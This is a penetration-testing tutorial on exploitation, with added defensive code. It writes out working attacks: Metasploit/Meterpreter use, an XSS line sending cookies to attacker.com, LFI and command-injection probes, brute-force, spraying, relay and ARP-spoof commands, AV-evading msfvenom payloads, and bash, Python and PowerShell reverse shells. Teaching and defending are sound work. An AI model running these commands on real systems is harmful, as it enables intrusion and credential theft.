The Moment of Truth
You’ve gathered intelligence. You’ve mapped the attack surface. You’ve identified vulnerabilities. Now comes the phase everyone imagines when they think of “hacking”—Exploitation.
Exploitation is the process of leveraging a vulnerability to achieve unauthorized access. But let me be clear: exploitation in professional pentesting is surgical and documented. We’re not causing damage—we’re proving risk.
Understanding Exploits
An exploit is code that takes advantage of a vulnerability. Vulnerabilities come in many forms:
- Software Bugs: Buffer overflows, use-after-free, race conditions.
- Misconfigurations: Default credentials, open shares, debug modes.
- Logic Flaws: Authentication bypasses, IDOR, privilege escalation.
- Known CVEs: Published vulnerabilities with public exploits.
The Exploit Lifecycle
- Vulnerability Discovery: Identified in recon phase.
- Exploit Selection: Find or create exploit code.
- Payload Selection: What do we want to achieve? (Shell, data, persistence)
- Execution: Deliver and trigger the exploit.
- Access: Gain foothold on the system.
Metasploit Framework
Metasploit is the world’s most popular penetration testing framework. It contains thousands of exploits, payloads, and auxiliary modules.
Architecture
┌─────────────────┐
│ Exploits        │ Code that triggers vulnerabilities
├─────────────────┤
│ Payloads        │ Code that runs after exploitation
├─────────────────┤
│ Auxiliary       │ Scanners, fuzzers, helpers
├─────────────────┤
│ Post            │ Post-exploitation modules
├─────────────────┤
│ Encoders        │ Obfuscate payloads to avoid AV
└─────────────────┘
Basic Workflow
# Start Metasploit
msfconsole
# Search for exploits
search type:exploit name:eternalblue
# Select an exploit
use exploit/windows/smb/ms17_010_eternalblue
# View options
show options
# Set target
set RHOSTS 192.168.1.100
# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
# Execute
exploit
Meterpreter
Meterpreter is Metasploit’s advanced payload—an in-memory, extensible shell.
# Inside Meterpreter session
meterpreter > sysinfo # System information
meterpreter > getuid # Current user
meterpreter > ps # List processes
meterpreter > hashdump # Dump password hashes
meterpreter > upload file.exe # Upload files
meterpreter > download file.txt # Download files
meterpreter > shell # Drop to system shell
meterpreter > getsystem # Attempt privilege escalation
Web Application Attacks
Web apps are the most common entry point. Let’s cover the big ones.
SQL Injection
SQL injection happens when user input is inserted directly into a SQL query string, so the database parses the input as part of the query itself.
# Original URL
http://target.com/user?id=1
# Test for SQLi
http://target.com/user?id=1'
http://target.com/user?id=1 OR 1=1--
# Automated exploitation
sqlmap -u "http://target.com/user?id=1" --dbs --dump
Defense: Parameterized queries, input validation.
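To make the defense concrete, here is an added example (not code from the original post) that runs the `id=1 OR 1=1--` payload above against a vulnerable lookup and a parameterized one. The `users` table is constructed in-memory with sqlite3; the function names are mine.

```python
import sqlite3


def make_db():
    # Constructed in-memory table standing in for the application's users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def lookup_vulnerable(conn, user_id):
    # The id parameter is concatenated into the statement, so it becomes SQL grammar:
    # "1 OR 1=1--" turns the WHERE clause into a tautology and returns every row.
    query = "SELECT id, name FROM users WHERE id = " + user_id
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    # Parameterized query: the driver binds the value separately; it is never parsed as SQL.
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (user_id,)).fetchall()


def lookup_validated(conn, user_id):
    # Input validation layered on top: this endpoint only ever accepts an integer id.
    try:
        parsed = int(user_id)
    except ValueError:
        raise ValueError(f"rejected id parameter: {user_id!r}") from None
    return lookup_safe(conn, parsed)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, "1 OR 1=1--"))  # every row comes back
    print("safe:", lookup_safe(db, "1 OR 1=1--"))              # no row matches
    print("safe:", lookup_safe(db, "1"))
```

The `1'` probe from the URL above raises a syntax error in the vulnerable version, which is exactly the signal an attacker is looking for; the parameterized version just returns no rows, and the validated version rejects the request before it reaches the database.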
Cross-Site Scripting (XSS)
Injecting JavaScript that executes in victims’ browsers.
<!-- Stored XSS -->
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
<!-- Reflected XSS -->
http://target.com/search?q=<script>alert('XSS')</script>
Defense: Output encoding, Content Security Policy.
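As an added example (mine, not from the original post), this shows the two defenses together: context-specific output encoding applied to the stored and reflected payloads above, and a nonce-based Content Security Policy header. The function names and the `/search` route are assumptions for the demonstration.

```python
import html
import secrets
from urllib.parse import quote


def render_comment(author, body):
    # HTML text context: html.escape turns < > & " ' into entities, so a stored
    # <script> payload is displayed as text instead of being parsed as markup.
    return f'<p class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</p>'


def render_search_echo(q):
    # Two contexts at once: the query goes into a URL (percent-encoded) and into
    # the visible text (HTML-escaped). Each context gets its own encoder.
    return (f'<a href="/search?q={quote(q, safe="")}">'
            f'Results for {html.escape(q)}</a>')


def csp_header(nonce):
    # Nonce-based CSP: only <script nonce="..."> tags minted by the server run;
    # an injected inline script that slips past encoding is still blocked.
    return ("Content-Security-Policy: default-src 'self'; "
            f"script-src 'nonce-{nonce}'; object-src 'none'; base-uri 'none'")


def new_nonce():
    # Fresh per-response nonce; never reuse one across responses.
    return secrets.token_urlsafe(16)


def has_live_script_tag(rendered):
    # Output check: a raw '<script' in rendered HTML means encoding was skipped somewhere.
    return "<script" in rendered.lower()
```

Encoding is per context: the same string needs `html.escape` in element text and `quote` inside a URL, and an attribute or JavaScript context would need its own encoder again. CSP is the backstop for the case you missed.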
Command Injection
Command injection happens when user input is passed into a system command that a shell interprets, so metacharacters like `;` or `|` in the input become new commands.
# Vulnerable code
os.system("ping " + user_input)
# Attack
user_input = "127.0.0.1; cat /etc/passwd"
Defense: Never pass user input to shells. Use safe APIs.
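Here is the safe replacement for the `os.system("ping " + user_input)` line, written as an added example (not from the original post): validate the argument's shape with the standard `ipaddress` module, then call `subprocess.run` with an argv list so no shell is ever involved. Function names are mine.

```python
import ipaddress
import subprocess


def validate_host(user_input):
    # Allowlist the argument's shape: a literal IPv4/IPv6 address and nothing else.
    # "127.0.0.1; cat /etc/passwd" fails here because it is not an address.
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        raise ValueError(f"rejected host argument: {user_input!r}") from None


def build_ping_argv(user_input, count=1):
    # argv list, no shell: even if a metacharacter got past validation it would reach
    # ping as one literal argument, never a shell that interprets ';' or '|'.
    return ["ping", "-c", str(count), validate_host(user_input)]


def run_ping(user_input):
    # Drop-in replacement for os.system("ping " + user_input): no shell, bounded runtime.
    result = subprocess.run(build_ping_argv(user_input), capture_output=True,
                            text=True, timeout=15)
    return result.returncode
```

If you genuinely need a hostname rather than an address, validate it against a strict hostname pattern instead; the point is that the value is checked against what the command expects, and the command is invoked without `shell=True`.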
Local File Inclusion (LFI)
# Normal request
http://target.com/page?file=about.php
# LFI attack
http://target.com/page?file=../../../etc/passwd
http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php
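The fix for the `?file=` parameter, as an added example of my own rather than code from the post: reject stream wrappers up front, resolve the requested name under the document root, and check containment after resolution so `../` sequences cannot escape. The document root path and the allowed suffixes are assumptions.

```python
from pathlib import Path

ALLOWED_SUFFIXES = {".php", ".html"}


def resolve_page(base_dir, requested):
    """Map a ?file= value to a file that must live under base_dir."""
    base = Path(base_dir).resolve()
    # Reject stream wrappers (php://, data://, ...) and absolute paths before touching the filesystem.
    if not requested or "://" in requested or requested.startswith(("/", "\\")):
        raise ValueError(f"rejected file parameter: {requested!r}")
    candidate = (base / requested).resolve()
    # Containment check on the *resolved* path: ../ sequences and symlinks cannot escape base_dir.
    if base not in candidate.parents:
        raise ValueError(f"path escapes document root: {requested!r}")
    if candidate.suffix not in ALLOWED_SUFFIXES:
        raise ValueError(f"file type not allowed: {requested!r}")
    return candidate


def load_page(base_dir, requested):
    return resolve_page(base_dir, requested).read_text()
```

Where the set of pages is small, a fixed allowlist mapping `about` to `about.php` is simpler still and removes the path from user control entirely.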
Insecure Direct Object Reference (IDOR)
# Your profile
http://target.com/api/user/1001
# Someone else's profile (unauthorized)
http://target.com/api/user/1002
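The missing piece in an IDOR is an object-level authorization check. This added example (mine, not from the post) shows the `/api/user/<id>` lookup with that check in front of the data access, plus a small self-check a defender can run to confirm a session cannot walk neighbouring ids. The profile store, the `support` role and the function names are constructed for the demonstration.

```python
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised when the caller is not allowed to touch the requested object."""


@dataclass(frozen=True)
class Session:
    user_id: int
    roles: frozenset = frozenset()


# Constructed profile store; the numeric keys mirror /api/user/<id>.
PROFILES = {
    1001: {"name": "alice", "email": "alice@example.test"},
    1002: {"name": "bob", "email": "bob@example.test"},
}


def can_read_profile(session, requested_id):
    # Object-level rule: you read your own profile, or you hold an explicit role for others.
    return session.user_id == requested_id or "support" in session.roles


def get_profile(session, requested_id):
    # Authorize before loading, so an unauthorized caller learns nothing about whether 1002 exists.
    if not can_read_profile(session, requested_id):
        raise Forbidden(f"user {session.user_id} may not read profile {requested_id}")
    profile = PROFILES.get(requested_id)
    if profile is None:
        raise KeyError(requested_id)
    return profile


def leak_check(session, ids):
    # Defender's self-check: with one session, count foreign profiles that come back readable.
    leaked = []
    for pid in ids:
        try:
            get_profile(session, pid)
            if pid != session.user_id:
                leaked.append(pid)
        except (Forbidden, KeyError):
            pass
    return leaked
```

The order matters: checking the role before the lookup means a forbidden request and a nonexistent record look the same from outside, which removes the enumeration signal the sequential ids otherwise hand out.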
Password Attacks
Sometimes the simplest path is through the front door.
Brute Force
# Hydra for SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# Hydra for web login
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
Password Spraying
Instead of many passwords against one user, try one password against many users.
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Summer2026!'
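Both the Hydra brute force and the spray above leave a distinctive trail in authentication logs, and the difference between them is the detection logic. As an added example (my code, not the post's), this parses constructed failed-login lines in a simplified sshd format and classifies each source: many failures against one account in a window is brute force, one failure each across many accounts is a spray. The same rule applies to Windows 4625 events; thresholds and window are assumptions to tune.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in a simplified sshd "Failed password" format.
SAMPLE_LOG = """\
2026-03-01T09:00:01 Failed password for admin from 203.0.113.7
2026-03-01T09:00:03 Failed password for admin from 203.0.113.7
2026-03-01T09:00:04 Failed password for admin from 203.0.113.7
2026-03-01T09:00:06 Failed password for admin from 203.0.113.7
2026-03-01T09:00:07 Failed password for admin from 203.0.113.7
2026-03-01T09:00:09 Failed password for admin from 203.0.113.7
2026-03-01T09:10:00 Failed password for alice from 198.51.100.9
2026-03-01T09:10:30 Failed password for bob from 198.51.100.9
2026-03-01T09:11:00 Failed password for carol from 198.51.100.9
2026-03-01T09:11:30 Failed password for dave from 198.51.100.9
2026-03-01T09:12:00 Failed password for erin from 198.51.100.9
2026-03-01T09:12:30 Failed password for frank from 198.51.100.9
2026-03-01T09:30:00 Failed password for alice from 192.0.2.5
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) Failed password for (?P<user>\S+) from (?P<src>\S+)$")


def parse_failures(text):
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["user"], m["src"]))
    return events


def classify(events, window=timedelta(minutes=10), threshold=5):
    """Slide a window over each source's failures.
    >= threshold failures for one account  -> brute_force
    >= threshold distinct accounts          -> password_spray"""
    findings = {}
    by_src = defaultdict(list)
    for ts, user, src in events:
        by_src[src].append((ts, user))
    for src, evs in by_src.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            users = [u for ts, u in evs[i:] if ts - start <= window]
            per_user = Counter(users)
            top_user, hits = per_user.most_common(1)[0]
            if hits >= threshold:
                findings[("brute_force", src)] = top_user
            if len(per_user) >= threshold:
                prev = findings.get(("password_spray", src), 0)
                findings[("password_spray", src)] = max(prev, len(per_user))
    return sorted((kind, src, detail) for (kind, src), detail in findings.items())


if __name__ == "__main__":
    for finding in classify(parse_failures(SAMPLE_LOG)):
        print(finding)
```

Keying on source address is the simplest version; a spray run through many egress addresses needs the same logic keyed on the set of target accounts per time window instead, and a lockout policy alone will not catch it because each account sees only one failure.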
Hash Cracking
# Hashcat with wordlist
hashcat -m 1000 hashes.txt rockyou.txt
# With rules
hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule
Network Attacks
Man-in-the-Middle (ARP Spoofing)
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# ARP spoof
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
# Capture traffic
wireshark
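On the defending side the two `arpspoof` commands above produce a visible change in ARP caches. This added example (mine, not from the post) compares a baseline and a later snapshot of a monitor's ARP table and raises the two classic alerts: the gateway's MAC changed, and one MAC now answers for several IPs. The snapshots are constructed two-column `ip mac` text; function names are assumptions.

```python
import re
from collections import defaultdict

# Constructed "ip mac" snapshots, the shape of `ip neigh` or `arp -n` output trimmed to two columns.
BASELINE = """\
192.168.1.1   aa:bb:cc:00:00:01
192.168.1.50  aa:bb:cc:00:00:50
192.168.1.100 aa:bb:cc:00:00:64
"""
# Constructed poisoned state: .1 and .100 both resolve to the MAC of .50.
POISONED = """\
192.168.1.1   aa:bb:cc:00:00:50
192.168.1.50  aa:bb:cc:00:00:50
192.168.1.100 aa:bb:cc:00:00:50
"""

ARP_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})$", re.I)


def parse_arp(text):
    table = {}
    for line in text.splitlines():
        m = ARP_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def detect_spoof(baseline, current, gateway_ip):
    alerts = []
    # 1. The gateway's MAC changed: the symptom a poisoned victim sees.
    if gateway_ip in baseline and current.get(gateway_ip) != baseline[gateway_ip]:
        alerts.append(("gateway_mac_changed", gateway_ip,
                       baseline[gateway_ip], current.get(gateway_ip)))
    # 2. One MAC claims several IPs: a host answering for both ends of a conversation.
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(("duplicate_mac", mac, tuple(sorted(ips))))
    return alerts


if __name__ == "__main__":
    for alert in detect_spoof(parse_arp(BASELINE), parse_arp(POISONED), "192.168.1.1"):
        print(alert)
```

Rule 2 has legitimate exceptions (VRRP/HSRP gateways, proxy ARP, bonded interfaces), so keep an allowlist of known shared MACs; the durable fix is Dynamic ARP Inspection on the switch, with static ARP entries for the gateway on critical hosts.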
LLMNR/NBT-NS Poisoning
# Responder captures NTLMv2 hashes
responder -I eth0 -wrf
SMB Relay
# Relay captured authentication
ntlmrelayx.py -tf targets.txt -smb2support
Creating Payloads
Sometimes pre-built exploits aren’t enough. We craft custom payloads.
Msfvenom
# Windows reverse shell executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe > shell.exe
# Linux reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf > shell.elf
# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw > shell.php
# Encoded to evade AV
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe
Simple Reverse Shells
# Bash
bash -i >& /dev/tcp/192.168.1.50/4444 0>&1
# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("192.168.1.50",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.50',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length)}"
Avoiding Rabbit Holes
Not every vulnerability leads to exploitation:
- False Positives: Scanners lie. Verify manually.
- Patched Systems: CVE exists but system is updated.
- Mitigating Controls: WAF, IPS blocking exploits.
- Scope Limitations: Vulnerability exists but exploitation not authorized.
Know when to move on. Document unexploited findings for the report.
Documentation During Exploitation
For every successful exploit, document:
- Target: IP, hostname, service.
- Vulnerability: CVE or description.
- Exploit Used: Module, script, or manual steps.
- Payload: What was delivered.
- Evidence: Screenshots, command output.
- Impact: What access was achieved.
Next Part: We’ve gained access. Now what? Post-Exploitation—privilege escalation, lateral movement, persistence, and data exfiltration.